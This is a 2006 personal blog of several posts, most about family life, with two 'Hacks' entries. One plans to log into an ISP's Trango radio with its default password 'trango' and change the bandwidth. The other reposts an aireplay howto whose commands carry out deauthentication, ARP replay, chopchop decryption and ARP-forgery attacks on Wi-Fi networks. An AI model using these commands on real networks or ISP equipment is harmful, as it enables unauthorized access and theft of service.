You just got served.... 
Wednesday, April 19, 2006, 03:43 PM - Hacks
So, while trying to get Microserve to return our phone calls, the secratary mentioned that they flashed out antenna, which got me thinking. Since i know that they use a propriatary system involving Trango broadband, i hopped onto the Trango website and downloaded some of the pdf files.

1. They use a propriatary mac filtering to authenticate radios.
The Access5830 system is classified as a Layer 2 multi-point bridge. Authentication of the SUs (Subscriber Unit) is performed using a secure, proprietary method at the MAC level, and thus all forms of Ethernet traffic and unlimited IP addresses will pass seamlessly over the system. There is no limitation on the number of IP addresses or hardware devices that an individual SU may have physically connected to it.

2. The FOX series SU's operate in either the 5.8 GHz ISM band or the 5.3 GHz UNII band. Which means the wifi G cards we use are not compatable (2.4 Ghz)

3. Yes, you can login to the radio itself.
(radio default IP address=
Heh, simple enough?
Default password is trango

4. You can change your bandwidth via the antenna?!
(super sweet)

5. The AP and SU have to have matching info in them. The AP cannot be access via the SU unit, so must be done physicly (serial cable) or from within the network. Both the AP and SU have the same look to this interface.

6. None of this has been tested YET, i am thinking that the radio address is no longer, but its not the static ip either, talking with a tech, i was told that the gateway is the tower and NOT the radio. I still need to do some hunting on the matter, but the pot of gold at the end of the rainbow looks promising.

x out.

[ add comment ]   |  permalink  |  related link  |   ( 3 / 777 )
6 in. of Snow 
Monday, April 17, 2006, 11:13 AM
We got over 6 inches of snow last night, and its still snowing. The cars were completly covered. The god part is that none of it stuck to the roads, so they were not slick.

Still annoying for the middle of april.

[ add comment ]   |  permalink  |  related link  |   ( 3 / 667 )
Monday, April 17, 2006, 11:08 AM - Family
The Durango hit 100,000 miles yesterday on our way home from Salt Lake.

Funny, i think a tie bearing is going out too... we shall see tonight.

[ add comment ]   |  permalink  |  related link  |   ( 3 / 665 )
Thursday, April 6, 2006, 10:35 PM - Family
A BBQ at extremes house turned sour when a bottle of worchestershire sauce was brutly murdered. The incedent took place at about 6:13 pm. The bottle was found dead on arraival. No suspects have been named.

[ add comment ]   |  permalink  |  related link  |   ( 3 / 494 )
Love Sacs! 
Monday, April 3, 2006, 12:26 AM - Family
We went to SLC this past weekend. We went to the love sac store and got a new cover for our 6 foot sac. We got an olive colored microsude, its much nicer than our old fur.
While we were there, we saw something in the bargain bin, a 2 foot love sac. It was the same color and style as our old fur. For 20$ we got a love sac for abbey!

I'm more excited than she is! Oh well, she will like it more when she gets a bit older.

[ add comment ]   |  permalink  |  related link  |   ( 3 / 505 )
BBQ Fire 
Monday, March 27, 2006, 02:00 AM
So, uh, my BBQ caught fire while i was cooking some ribs.
No damage to the bbq, but it was still odd that i had to use baking soda to put it out. Man, thoes ribs must have been super greasy!

[ add comment ]   |  permalink  |  related link  |   ( 3 / 644 )
aireplay mini-howto 
Friday, March 24, 2006, 03:10 PM - Hacks
aireplay mini-howto

Example test setup:

* Acess Point (hostap) - 00:02:2D:AA:9C:13 ,
* Wireless client (madwifi) - 00:09:5B:FC:21:F4 ,
* Laptop with a Prism2 or Atheros of Prism54 card

0. Changes since last release

* built-in chopchop operation mode
* added a bunch of options in aireplay
* added deauthentication frame forgery
* Prism2 (wlan-ng) USB device support
* Atheros (madwifi) and Prism54 device support

1. Driver recompilation

1.1. Installing linux-wlan-ng-0.2.1-pre26

First, make sure you have updated your card's station and primary
firmware with a recent version; I recommend STA 1.7.4 / PRI 1.1.1.

cd /usr/src
wget --passive-ftp
tar -xvjf linux-wlan-ng-0.2.1-pre26.tar.bz2
cd linux-wlan-ng-0.2.1-pre26
patch -Np1 -i ~/aireplay-2.2/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1
make config
make all
find /lib/modules \( -name p80211* -o -name prism2* \) -exec rm -v {} \;
make -C src install
cp etc/pcmcia/wlan-ng.conf /etc/pcmcia/
mv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~
ifconfig wlan0 down
wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
/etc/init.d/pcmcia restart
(reinsert card)

1.2. Installing madwifi

Note: a tarball is also available at

cd /usr/src
cvs -z3 co madwifi
cd madwifi
patch -Np1 -i ~/aireplay-2.2/patch/madwifi-20050309.patch.0.1
make install
modprobe ath_pci

1.3. Installing prism54

Make sure the hotplug package is installed and hotplug firmware
loading support is present in your kernel (module firmware_class).

cd /usr/src
wget ... st.tar.bz2
tar -xvjf prism54-svn-latest.tar.bz2
cd prism54-svn-latest
make modules
make install
mkdir -p /usr/lib/hotplug/firmware
mv /usr/lib/hotplug/firmware/isl3890
modprobe prism54

2. Using aireplay

*** aireplay does not capture replies: ***
*** you must start airodump in parallel ***

If you use madwifi, you may have to place the card in
pure 802.11b mode first:

iwpriv ath0 mode 2

If you use wlan-ng, run ./ start wlan0 <channel>
Otherwise run:

iwconfig ath0 mode Monitor channel <channel>
ifconfig ath0 up

2.1. Attack 1: deauthentication

This attack is especially useful to capture an ESSID or a WPA handshake.

./airforge 00:02:2D:AA:9C:13 00:09:5B:FC:21:F4 deauth.pcap
./aireplay -m 26 -u 0 -v 12 -w 0 -x 1 -r deauth.pcap ath0

2.2. Attack 2: classic arp-request resend

./aireplay -f 0 -t 1 -m 68 -n 68 -d FF:FF:FF:FF:FF:FF ath0

2.3. Attack 3: data broadcast resend

This attack is quite unreliable and often doesn't work. You need
the MAC address of an authenticated station so that the AP will
not drop the packets. As most APs work in open authentication mode,
if you have another wireless card, you can simply associate it
and use its MAC address.

./aireplay -h 00:09:5B:FC:21:F4 -c FF:FF:FF:FF:FF:FF -o 08 -p 41 ath0

2.4. Attack 4: arp-request forgery

First, we need a prga by decrypting a data packet. For this, add the -k
flag which will enable KoreK's chopchop attack:

./aireplay -k eth1

This attack may not work in deauthenticated mode (in which the source
MAC address is forged). If this is the case, you will have the pass the
address of an authenticated station:

./aireplay -h 00:09:5B:FC:21:F4 -k eth1

Have a look at the decrypted packet:

tcpdump -e -n -t -r replay_dec-050320-023844.pcap

BSSID:00:02:2d:aa:9c:13 SA:00:09:5b:fc:21:f4 DA:00:05:1b:44:8a:ce LLC, dsap
SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03, IP > S
2961438793:2961438793(0) win 5840 <mss 1460,sackOK,...>

Now we have enough information to forge an ARP request:

./airforge replay_dec-050320-023844.prga 1 00:02:2d:aa:9c:13 \
00:09:5b:fc:21:f4 arp.pcap

And finally:

./aireplay -r arp.pcap ath0

[ add comment ]   |  permalink  |  related link  |   ( 3 / 1192 )

Back Next